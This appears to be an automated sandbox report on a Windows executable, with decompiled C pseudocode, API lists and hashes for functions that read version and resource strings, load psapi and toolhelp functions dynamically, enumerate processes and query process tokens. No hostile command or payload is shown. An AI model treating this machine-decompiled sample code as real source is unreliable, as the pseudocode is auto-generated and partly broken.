                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                        • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                        • API String ID: 486436031-734527199
                                                                                                        • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                        • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                        • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                        • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                        0x00406466
                                                                                                        0x0040647d
                                                                                                        0x00406484
                                                                                                        0x00406499
                                                                                                        0x004064a0
                                                                                                        0x004064af
                                                                                                        0x004064b4
                                                                                                        0x004064bb
                                                                                                        0x004064cd
                                                                                                        0x004064d2
                                                                                                        0x004064d4
                                                                                                        0x004064e4
                                                                                                        0x004064ea
                                                                                                        0x004064ea
                                                                                                        0x004064f3
                                                                                                        0x00406503
                                                                                                        0x00406514
                                                                                                        0x00406525
                                                                                                        0x0040653b
                                                                                                        0x0040654e
                                                                                                        0x00406568
                                                                                                        0x00406572
                                                                                                        0x0040657a
                                                                                                        0x00406582
                                                                                                        0x0040658a
                                                                                                        0x00406596

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00406484
                                                                                                        • memset.MSVCRT ref: 004064A0
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                          • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                          • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                          • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                          • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                          • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                          • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                          • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                        • wcscpy.MSVCRT ref: 004064E4
                                                                                                        • wcscpy.MSVCRT ref: 004064F3
                                                                                                        • wcscpy.MSVCRT ref: 00406503
                                                                                                        • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                        • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                        • wcscpy.MSVCRT ref: 0040657A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                        • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                        • API String ID: 3037099051-2314623505
                                                                                                        • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                        • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                        • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                        • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                        0x00409ab0
                                                                                                        0x00409ab7
                                                                                                        0x00409ac8
                                                                                                        0x00409acf
                                                                                                        0x00409ad4
                                                                                                        0x00409ae0
                                                                                                        0x00409ae6
                                                                                                        0x00409ae8
                                                                                                        0x00409af0
                                                                                                        0x00409c3a
                                                                                                        0x00409c41
                                                                                                        0x00409c67
                                                                                                        0x00000000
                                                                                                        0x00409c67
                                                                                                        0x00409c49
                                                                                                        0x00409c50
                                                                                                        0x00409c51
                                                                                                        0x00409c56
                                                                                                        0x00409c57
                                                                                                        0x00409c5a
                                                                                                        0x00000000
                                                                                                        0x00409c64
                                                                                                        0x00409b00
                                                                                                        0x00409b03
                                                                                                        0x00409b06
                                                                                                        0x00409b0b
                                                                                                        0x00409b10
                                                                                                        0x00409ba9
                                                                                                        0x00409bac
                                                                                                        0x00409bc1
                                                                                                        0x00409bc7
                                                                                                        0x00409bcc
                                                                                                        0x00409bd8
                                                                                                        0x00409bf0
                                                                                                        0x00409bf2
                                                                                                        0x00409c23
                                                                                                        0x00409c26
                                                                                                        0x00409c2f
                                                                                                        0x00409c34
                                                                                                        0x00409c34
                                                                                                        0x00000000
                                                                                                        0x00409c2f
                                                                                                        0x00409bf7
                                                                                                        0x00409bfb
                                                                                                        0x00409c02
                                                                                                        0x00409c06
                                                                                                        0x00409c0d
                                                                                                        0x00409c14
                                                                                                        0x00409c17
                                                                                                        0x00409c18
                                                                                                        0x00409c1b
                                                                                                        0x00409c1e
                                                                                                        0x00000000
                                                                                                        0x00409c1e
                                                                                                        0x00409b1f
                                                                                                        0x00409b25
                                                                                                        0x00409b2a
                                                                                                        0x00409b2d
                                                                                                        0x00409b33
                                                                                                        0x00409b3d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00409b4b
                                                                                                        0x00409b53
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00409b6a
                                                                                                        0x00409b6c
                                                                                                        0x00409b6e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00409b77
                                                                                                        0x00409b7b
                                                                                                        0x00409b82
                                                                                                        0x00409b86
                                                                                                        0x00409b8d
                                                                                                        0x00409b8e
                                                                                                        0x00409b94
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00409AB7
                                                                                                        • memset.MSVCRT ref: 00409ACF
                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                        • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                          • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                        • memset.MSVCRT ref: 00409B25
                                                                                                        • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                        • memset.MSVCRT ref: 00409BC7
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                        • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                        • API String ID: 3504373036-27875219
                                                                                                        • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                        • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                        • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                        • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                        0x00409179
                                                                                                        0x00409209
                                                                                                        0x00409209
                                                                                                        0x00409185
                                                                                                        0x0040918a
                                                                                                        0x0040918f
                                                                                                        0x00409208
                                                                                                        0x00000000
                                                                                                        0x00409191
                                                                                                        0x0040919e
                                                                                                        0x004091a2
                                                                                                        0x004091a7
                                                                                                        0x004091af
                                                                                                        0x004091b3
                                                                                                        0x004091b8
                                                                                                        0x004091c0
                                                                                                        0x004091c4
                                                                                                        0x004091c9
                                                                                                        0x004091d1
                                                                                                        0x004091d5
                                                                                                        0x004091da
                                                                                                        0x004091e2
                                                                                                        0x004091e6
                                                                                                        0x004091eb
                                                                                                        0x004091ed
                                                                                                        0x004091ed
                                                                                                        0x004091eb
                                                                                                        0x004091da
                                                                                                        0x004091c9
                                                                                                        0x004091b8
                                                                                                        0x004091ff
                                                                                                        0x00409202
                                                                                                        0x00409202
                                                                                                        0x00000000
                                                                                                        0x004091ff

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                        • API String ID: 1182944575-70141382
                                                                                                        • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                        • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                        • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                        • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                        0x004090f5
                                                                                                        0x00409171
                                                                                                        0x00409171
                                                                                                        0x004090fd
                                                                                                        0x00409103
                                                                                                        0x00409107
                                                                                                        0x00409170
                                                                                                        0x00000000
                                                                                                        0x00409170
                                                                                                        0x00409116
                                                                                                        0x0040911a
                                                                                                        0x0040911f
                                                                                                        0x00409127
                                                                                                        0x0040912b
                                                                                                        0x00409130
                                                                                                        0x00409138
                                                                                                        0x0040913c
                                                                                                        0x00409141
                                                                                                        0x00409149
                                                                                                        0x0040914d
                                                                                                        0x00409152
                                                                                                        0x0040915a
                                                                                                        0x0040915e
                                                                                                        0x00409163
                                                                                                        0x00409165
                                                                                                        0x00409165
                                                                                                        0x00409163
                                                                                                        0x00409152
                                                                                                        0x00409141
                                                                                                        0x00409130
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                        • API String ID: 667068680-3953557276
                                                                                                        • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                        • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                        • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                        • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 56%
                                                                                                        			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                        0x00409faf
                                                                                                        0x00409fb4
                                                                                                        0x00409fb5
                                                                                                        0x00409fb6
                                                                                                        0x0040a043
                                                                                                        0x0040a04a
                                                                                                        0x0040a058
                                                                                                        0x0040a05f
                                                                                                        0x0040a06d
                                                                                                        0x0040a074
                                                                                                        0x0040a08e
                                                                                                        0x0040a099
                                                                                                        0x0040a0ab
                                                                                                        0x0040a0c9
                                                                                                        0x0040a0ce
                                                                                                        0x00000000
                                                                                                        0x0040a0ce
                                                                                                        0x00409fc3
                                                                                                        0x00409fca
                                                                                                        0x00409fd8
                                                                                                        0x00409fdf
                                                                                                        0x00409ff9
                                                                                                        0x0040a006
                                                                                                        0x0040a018
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf
                                                                                                        • String ID: %%0.%df
                                                                                                        • API String ID: 3473751417-763548558
                                                                                                        • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                        • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                        • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                        • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 51%
                                                                                                        			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                        0x00406216
                                                                                                        0x0040621b
                                                                                                        0x00406222
                                                                                                        0x0040625f
                                                                                                        0x00406263
                                                                                                        0x00406269
                                                                                                        0x00406271
                                                                                                        0x00406273
                                                                                                        0x00406289
                                                                                                        0x00406289
                                                                                                        0x0040628e
                                                                                                        0x0040628f
                                                                                                        0x004062a9
                                                                                                        0x004062ab
                                                                                                        0x004062ad
                                                                                                        0x004062b0
                                                                                                        0x004062c3
                                                                                                        0x004062c3
                                                                                                        0x004062d3
                                                                                                        0x004062da
                                                                                                        0x004062f1
                                                                                                        0x004062f7
                                                                                                        0x004062fe
                                                                                                        0x0040630d
                                                                                                        0x00406312
                                                                                                        0x0040631e
                                                                                                        0x00406327
                                                                                                        0x00406275
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406285
                                                                                                        0x00406287
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406277
                                                                                                        0x0040627a
                                                                                                        0x00406280
                                                                                                        0x00406280
                                                                                                        0x00000000
                                                                                                        0x00406280
                                                                                                        0x00000000
                                                                                                        0x0040627a
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406273
                                                                                                        0x00406224
                                                                                                        0x00406224
                                                                                                        0x00406229
                                                                                                        0x0040622a
                                                                                                        0x0040622f
                                                                                                        0x00406236
                                                                                                        0x0040623c
                                                                                                        0x00406243
                                                                                                        0x00406245
                                                                                                        0x00406247
                                                                                                        0x00406248
                                                                                                        0x0040624b
                                                                                                        0x00406254
                                                                                                        0x00406254
                                                                                                        0x0040632d
                                                                                                        0x00406334

                                                                                                        APIs
                                                                                                        • LoadMenuW.USER32 ref: 00406236
                                                                                                          • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                          • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                          • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                          • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                        • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                        • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                        • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                        • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                        • memset.MSVCRT ref: 004062DA
                                                                                                        • GetWindowTextW.USER32 ref: 004062F1
                                                                                                        • EnumChildWindows.USER32 ref: 0040631E
                                                                                                        • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                          • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
